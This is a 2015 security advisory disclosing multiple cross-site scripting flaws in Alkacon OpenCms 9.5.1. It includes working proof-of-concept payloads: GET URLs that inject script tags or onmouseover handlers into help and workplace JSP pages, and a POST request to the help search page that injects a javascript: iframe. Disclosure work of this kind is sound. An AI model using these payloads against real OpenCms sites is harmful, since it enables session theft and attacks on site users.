Product: OpenCms Vendor: Alkacon Software Vulnerable Version(s): 9.5.1 and probably prior Tested Version: 9.5.1 Vendor Notification: Mar 05, 2015 (https://github.com/alkacon/opencms-core/issues/304) Vendor Patch: Not Yet (No Specific Time-line) Public Disclosure: Mar 12, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: Risk Level: Medium CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) Solution Status: Not Yet (https://github.com/alkacon/opencms-core/) Discovered and Credits: Rehan Ahmed (knight_rehan@xxxxxxxxxxx) _______________________________________________________________________________________________________________________ Overview _______________________________________________________________________________________________________________________ Alkacon OpenCms 9.5.1 or prior versions are prone to a multiple cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. _______________________________________________________________________________________________________________________ Vendor's Description of Application _______________________________________________________________________________________________________________________ OpenCms from Alkacon Software is a professional, easy to use website content management system. OpenCms helps content managers worldwide to create and maintain beautiful websites fast and efficiently. The fully browser based user interface features configurable editors for structured content with well defined fields. Alternatively, content can be created using an integrated WYSIWYG editor similar to well known office applications. A sophisticated template engine enforces a site-wide corporate layout and W3C standard compliance for all content. OpenCms is based on Java and XML technology. It can be deployed in an open source environment (e.g. Linux, Apache, Tomcat, MySQL) as well as on commercial components (e.g. Windows NT, IIS, BEA Weblogic, Oracle). As true open source software, OpenCms is free of licensing costs. http://www.opencms.org/en/index.html _______________________________________________________________________________________________________________________ Vulnerability Details & Exploit _______________________________________________________________________________________________________________________ Method: GET /opencms/system/modules/org.opencms.workplace.help/jsptemplates/help_head.jsp?__locale=en&homelink="+onmouseover="javascript:confirm(0);">Click HERE<!-- /opencms/system/workplace/locales/en/help/index.html?buildframe=true&workplaceresource="+onmouseover=confirm(0)// /opencms/system/workplace/views/admin/admin-main.jsp?root=explorer&menu=no&path=%2Fpublishqueue';</script><script>confirm(0)</script> /opencms/system/workplace/views/explorer/explorer_files.jsp?mode=explorerview";</script><script>confirm(0)</script> Method: POST POST /opencms/system/modules/org.opencms.workplace.help/elements/search.jsp?__locale=en HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Accept-Language: en-US Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://127.0.0.1:8080/opencms/system/modules/org.opencms.workplace.help/jsptemplates/help_head.jsp?__locale=en&homelink=null&workplaceresource=&buildframe=true Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Content-Length: 104 action=search&query=<iframe src=javascript:confirm(0);&index=German+online+help&searchPage=1&query2=1234 _______________________________________________________________________________________________________________________
